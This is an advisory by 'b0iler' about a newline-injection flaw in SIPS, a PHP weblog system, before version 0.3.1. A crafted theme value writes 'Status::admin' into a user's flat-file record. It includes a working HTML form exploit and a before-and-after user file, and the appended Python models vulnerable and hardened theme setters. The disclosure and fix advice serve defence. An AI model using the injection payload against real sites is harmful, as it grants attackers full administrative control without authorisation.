#!/exploit/by/b0iler
# sips - http://sourceforge.net/projects/sips/
# versions lower than 0.3.1

Taken from freshmeat:

"About: SIPS is an integrated Weblog and link-indexing system written in PHP. It is aimed at those with access to databaseless, PHP-enabled Web servers who want to run a Weblog site like Slashdot and/or a simple link index like Yahoo!."

Ok, this one took a while to find since the code is long, but at least it was fairly easy to read. The script works much like phpnuke or slashcode; SIPS stands for Simple Internet Publishing System.

The problem I found is that when a user selects a theme, the theme name is written verbatim into that user's database file (SIPS keeps one flat "Key::value" file per user instead of a real database). When the user then goes to admin.php, the script only checks that the user's password is correct and that the Status key in their database file is equal to admin. So I did a little playing around and got a theme value containing a line break to write "Status::admin" as a new line in the user's database file. This makes the user an admin of the script, giving them complete control over the site.

Key to securing this code is to filter all input, even if you think it won't be changed by the user: it can be. Checking that the submitted theme actually exists would also be a good idea.

To exploit this we just need to change the theme selection page to something like this:

    <form action="http://www.site.com/sips/htdocs/preferences.php" method="post">
    <input type="hidden" name="op" value="theme">
    <input type="hidden" name="action" value="settheme">
    <select name="themename">
    <option value="default
    Status::admin
    ">Exploited</option>
    </select>
    <input type="submit" value="Set Theme">
    </form>

Here we submit a theme with the value of:

    default -linebreak
    Status::admin -linebreak

(SIPS chops the theme input, so the trailing linebreak is removed and the rest is written as-is.)
This will change an account from something like this:

    bash-2.03$ cat user
    Password::660120d6fbc1sn241be39290636b2942
    Email::b0iler@hotmail.com
    Theme::default
    Timezone::Greenwich Mean

to something like this:

    bash-2.03$ cat user
    Password::660120d6fbc1sn241be39290636b2942
    Email::b0iler@hotmail.com
    Timezone::Greenwich Mean
    Theme::default
    Status::admin

The Status::admin line allows you to use http://www.site.com/sips/htdocs/admin/index.php, which gives you total control over SIPS (pretty much the whole site).

The author was contacted on 2/1/02 and replied the same day. The author released version 0.3.1 on 2/8/02 and wrote a very nice page detailing the problem and possible solutions: http://sips.sourceforge.net/adminvul.html

-http://b0iler.advknowledge.net
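Added example, not part of the original advisory or of SIPS itself: a small Python model of the "Key::value" per-user flat file and of the theme update, showing how a line break in the theme value plants a Status::admin line that the admin check later trusts, next to a hardened version that only accepts a theme name matching a strict pattern and present in an (assumed) list of installed themes. The record contents, the theme list and all function names are constructed for illustration; the real SIPS file layout is only known from the `cat user` output above, and the record ordering SIPS produces is not modelled.

```python
import re

# Constructed stand-in for a SIPS user file: one "Key::value" per line.
# Values are taken from the advisory's "before" listing.
USER_BEFORE = (
    "Password::660120d6fbc1sn241be39290636b2942\n"
    "Email::b0iler@hotmail.com\n"
    "Theme::default\n"
    "Timezone::Greenwich Mean\n"
)

# Assumed set of installed themes (what a directory listing of the theme
# directory would give). Hypothetical; SIPS's real theme names are unknown here.
KNOWN_THEMES = {"default", "dark"}

# A theme name is a single path-safe token: no whitespace, no "::", no newline.
THEME_NAME = re.compile(r"[A-Za-z0-9_-]+")


def parse_record(text):
    """Parse 'Key::value' lines into a dict. A later duplicate key wins, which
    is exactly why a smuggled 'Status::admin' line is honoured."""
    rec = {}
    for line in text.splitlines():
        if "::" in line:
            key, value = line.split("::", 1)
            rec[key.strip()] = value.strip()
    return rec


def dump_record(rec):
    """Serialise the dict back to the flat-file format."""
    return "".join(f"{key}::{value}\n" for key, value in rec.items())


def is_admin(text):
    """Models the admin.php check: only the Status key is consulted."""
    return parse_record(text).get("Status") == "admin"


def set_theme_vulnerable(text, theme):
    """Models the pre-0.3.1 behaviour: chop() the trailing whitespace and
    write whatever is left straight into the user's record."""
    rec = parse_record(text)
    rec["Theme"] = theme.rstrip()
    return dump_record(rec)


def set_theme_hardened(text, theme):
    """Filter the input (strict token pattern) and check the theme exists."""
    theme = theme.rstrip()
    if not THEME_NAME.fullmatch(theme):
        raise ValueError("theme name contains disallowed characters")
    if theme not in KNOWN_THEMES:
        raise ValueError("unknown theme")
    rec = parse_record(text)
    rec["Theme"] = theme
    return dump_record(rec)


def theme_accepted(text, theme):
    """True if the hardened setter accepts the theme, False if it rejects it."""
    try:
        set_theme_hardened(text, theme)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    payload = "default\nStatus::admin\n"   # the form's option value
    pwned = set_theme_vulnerable(USER_BEFORE, payload)
    print(pwned)
    print("admin after vulnerable update:", is_admin(pwned))
    print("hardened accepts payload:", theme_accepted(USER_BEFORE, payload))
    print("hardened accepts 'dark':", theme_accepted(USER_BEFORE, "dark"))
```

The parser deliberately lets a later key override an earlier one, because that is what makes the injected line effective: the admin check never cares where the Status line came from, only that it is present. The hardened setter fixes both points the advisory raises, rejecting any value that is not a single clean token and any token that is not an installed theme.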